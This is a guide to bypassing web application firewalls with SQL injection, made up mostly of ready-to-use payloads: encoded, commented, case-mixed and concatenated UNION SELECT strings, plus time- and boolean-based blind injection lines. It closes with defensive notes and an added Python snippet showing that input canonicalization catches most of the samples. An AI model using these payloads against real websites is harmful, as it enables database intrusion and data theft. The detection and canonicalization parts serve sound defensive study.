# WAF Bypass Techniques for SQL Injection

### **1. Using Encoding and Obfuscation**

**URL Encoding**

* Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs. This only defeats filters that match on the raw request; a WAF that URL-decodes the parameter before inspecting it sees the plain text.

```sql
%27%20UNION%20SELECT%20NULL,NULL,NULL--
```

**Double URL Encoding**

* Double-encode the payload to evade more sophisticated detection mechanisms. This relies on a decoding mismatch: a WAF that decodes once still sees `%27`, while an application that decodes a second time receives `'`. Decoding repeatedly until the value stops changing (with a bounded number of rounds) closes that gap.

```sql
%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--
```

**Hex Encoding**

* Use hexadecimal literals for string values so that the SQL text contains no recognizable words. The literals are interpreted by the database, not by the WAF (`0x61646D696E` is `admin`, `0x70617373776F7264` is `password`).

```sql
' UNION SELECT 0x61646D696E, 0x70617373776F7264 --
```

### **2. Case Manipulation and Comments**

**Mixed Case**

* Change the case of SQL keywords to avoid case-sensitive filters. SQL keywords are case-insensitive in every common dialect, so the query still executes unchanged.

```sql
' uNioN SeLecT NULL, NULL --
```

**Inline Comments**

* Insert inline comments between SQL keywords to break up recognizable patterns. The database treats `/**/` as whitespace, so `UNION/**/SELECT` is equivalent to `UNION SELECT`.

```sql
' UNION/**/SELECT/**/NULL,NULL --
```

### **3. Whitespace and Special Characters**

**Using Different Whitespace Characters**

* Replace spaces with other whitespace characters such as tabs, carriage returns or newlines (`%0D%0A` below) to defeat string-matching filters that look for `UNION SELECT` with a single literal space.

```sql
' UNION%0D%0ASELECT%0D%0A NULL,NULL --
```

**Concatenation with Special Characters**

* Use character functions and concatenation to assemble string values at query time so that no literal appears in the request (the example builds `user` and `pass`). Note that `||` is string concatenation in PostgreSQL, Oracle and SQLite, but logical OR in MySQL unless `PIPES_AS_CONCAT` is enabled; MySQL uses `CONCAT()` instead.

```sql
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
```

### **4. SQL Function and Command Obfuscation**

**String Concatenation**

* Break string literals into smaller pieces and concatenate them so that the complete value never appears in the request.

```sql
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
```

**Using SQL Functions**

* Use built-in SQL functions in place of literals so that the request contains fewer recognizable strings. The example calls MySQL's `VERSION()` and `DATABASE()`, which return the server version and the current database name.

```sql
' UNION SELECT VERSION(), DATABASE() --
```

### **5. Time-Based and Boolean-Based Payloads**

**Time-Based Blind SQL Injection**

* Use time delays to infer information from the response time. `IF()` and `SLEEP()` are MySQL functions. A parameter that is normally fast but suddenly takes several seconds to respond is a useful detection signal on the defending side.

```sql
' AND IF(1=1, SLEEP(5), 0) --
```

**Boolean-Based Blind SQL Injection**

* Use conditional expressions so that the response differs depending on whether a condition is true or false.

```sql
' AND IF(1=1, 'A', 'B')='A' --
```

### **6. Advanced Encoding Techniques**

**Base64 Encoding**

* Base64-encode string values so that filters looking for plain-text keywords do not see them. Note that `FROM_BASE64()` (MySQL) only returns the decoded text as data: in the example below, `select version()` is returned as a string value, not executed as SQL.

```sql
' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --
```

**Custom Encoding Scripts**

* Develop custom scripts to encode and decode payloads in different formats to evade detection.

### **7. Chaining Techniques**

**Combining Multiple Bypass Techniques**

* Combine several techniques to create more complex and harder-to-detect payloads. The example below layers URL encoding, inline comments and `CHAR()` concatenation; each layer targets a different filter weakness, so a WAF must normalize all of them before matching.

```sql
%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A
```

### **8. Leveraging Lesser-Known SQL Features**

**Using JSON Functions**

* Use JSON functions to read and shape data in ways that simple keyword lists are less likely to cover. `json_extract()` is available in MySQL and SQLite.

```sql
' UNION SELECT json_extract(column_name, '$.key') FROM table_name --
```

**Using XML Functions**

* Use XML functions to construct more sophisticated payloads. `extractvalue()` is MySQL-specific.

```sql
' UNION SELECT extractvalue(1, 'version()') --
```

These techniques highlight various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, or manipulation strategies to evade detection and extract data from vulnerable databases. Most of them target the same weakness, a filter that matches on the raw request: a WAF that canonicalizes input first (bounded URL decoding, comment stripping, whitespace and case normalization) sees through them, and parameterized queries remove the injection altogether.
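As an added example (not part of the original page), the Python snippet below shows why the techniques in sections 1, 2, 3 and 7 defeat a raw keyword signature and why a WAF that canonicalizes the parameter first does not: it URL-decodes with a round limit, strips `/**/` comments, collapses whitespace and lower-cases each sample before matching. The sample strings, the sample names and the two signatures are constructed for this demonstration.

```python
import re
from urllib.parse import unquote

# Constructed samples mirroring the page's techniques (not captured traffic).
SAMPLES = {
    "plain":           "' UNION SELECT NULL,NULL --",
    "url_encoded":     "%27%20UNION%20SELECT%20NULL,NULL,NULL--",
    "double_encoded":  "%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--",
    "mixed_case":      "' uNioN SeLecT NULL, NULL --",
    "inline_comment":  "' UNION/**/SELECT/**/NULL,NULL --",
    "crlf_whitespace": "' UNION%0D%0ASELECT%0D%0A NULL,NULL --",
    "chained": "%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115),%20CHAR(112)%20--%0A",
}

# A raw, case-sensitive keyword signature: what a naive filter matches on.
NAIVE_PATTERN = re.compile(r"UNION SELECT")
# The same signature, applied only after canonicalization.
CANON_PATTERN = re.compile(r"\bunion\s+select\b")


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Normalize a request parameter the way a WAF should before inspecting it."""
    # URL-decode until the value stops changing; the round limit keeps a
    # deeply nested encoding from turning the decoder into a stall.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # drop /**/ comments
    value = re.sub(r"\s+", " ", value)                    # tabs/CR/LF -> one space
    return value.strip().lower()                          # case-insensitive match

def naive_match(value: str) -> bool:
    return NAIVE_PATTERN.search(value) is not None

def canonical_match(value: str) -> bool:
    return CANON_PATTERN.search(canonicalize(value)) is not None

def evaluate(samples=SAMPLES) -> dict:
    """Per sample: (naive detector fired, canonicalizing detector fired)."""
    return {name: (naive_match(p), canonical_match(p)) for name, p in samples.items()}

if __name__ == "__main__":
    for name, (naive, canon) in evaluate().items():
        print(f"{name:16} naive={naive!s:5} canonical={canon}")
```

Only the `plain` sample trips the raw signature; every obfuscated variant is caught once the same signature runs over the canonicalized value.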
